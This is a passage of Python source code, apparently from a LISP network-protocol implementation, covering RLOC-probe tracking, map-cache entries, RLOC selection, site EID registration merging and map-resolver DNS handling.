self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL and if the value is greater than 10% of
# TTL, refresh entry. So that is around every 13 or 14 seconds.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
